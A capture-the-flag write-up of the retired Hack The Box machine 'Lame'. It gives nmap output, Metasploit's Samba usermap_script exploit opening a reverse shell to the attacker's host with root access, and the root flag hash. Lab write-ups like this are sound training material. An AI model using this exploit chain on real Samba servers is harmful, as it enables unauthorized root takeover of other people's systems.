HTB: Lame
Introduction
This is a machine from hackthebox.eu. According to the HTB policy I can publish this write-up seeing the machine is ‘retired’.
Enumeration
Starting with a portscan.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 08:54 CEST Nmap scan report for 10.10.10.3 Host is up (0.025s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.3 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2017-09-29T02:55:45-04:00 |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using proto 1/icmp) HOP RTT ADDRESS 1 27.12 ms 10.10.14.1 2 24.79 ms 10.10.10.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 200.03 seconds |
On first sight I would think that my entry point is the ftp service running on port 21. This particular version has a intended backdoor and is easily accessible from the outside. Oddly enough after several tries this known backdoor isn’t responding. Time to check on the next possible vulnerability.
After checking exploit-db it seems this samba version is vulnerable.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
msf exploit(usermap_script) > exploit -j [*] Exploit running as background job 3. [*] Started reverse TCP double handler on 10.10.14.3:4444 msf exploit(usermap_script) > [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo i2UsybyxuoY1LtnB; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "i2UsybyxuoY1LtnB\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:45093) at 2017-09-29 09:12:49 +0200 |
1 2 3 4 |
msf exploit(usermap_script) > sessions -i 1 [*] Starting interaction with 1... id uid=0(root) gid=0(root) |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
cd /root ls -lah total 80K drwxr-xr-x 13 root root 4.0K Sep 28 23:47 . drwxr-xr-x 21 root root 4.0K May 20 2012 .. -rw------- 1 root root 373 Sep 28 23:47 .Xauthority lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null -rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc drwx------ 3 root root 4.0K May 20 2012 .config drwx------ 2 root root 4.0K May 20 2012 .filezilla drwxr-xr-x 5 root root 4.0K Sep 28 23:47 .fluxbox drwx------ 2 root root 4.0K May 20 2012 .gconf drwx------ 2 root root 4.0K May 20 2012 .gconfd drwxr-xr-x 2 root root 4.0K May 20 2012 .gstreamer-0.10 drwx------ 4 root root 4.0K May 20 2012 .mozilla -rw-r--r-- 1 root root 141 Oct 20 2007 .profile drwx------ 5 root root 4.0K May 20 2012 .purple -rwx------ 1 root root 4 May 20 2012 .rhosts drwxr-xr-x 2 root root 4.0K May 20 2012 .ssh drwx------ 2 root root 4.0K Sep 28 23:47 .vnc drwxr-xr-x 2 root root 4.0K May 20 2012 Desktop -rwx------ 1 root root 401 May 20 2012 reset_logs.sh -rw------- 1 root root 33 Mar 14 2017 root.txt -rw-r--r-- 1 root root 118 Sep 28 23:47 vnc.log cat root.txt 92caac3be140ef409e45721348a4e9df |
And there is the needed hash to prove me owning this box.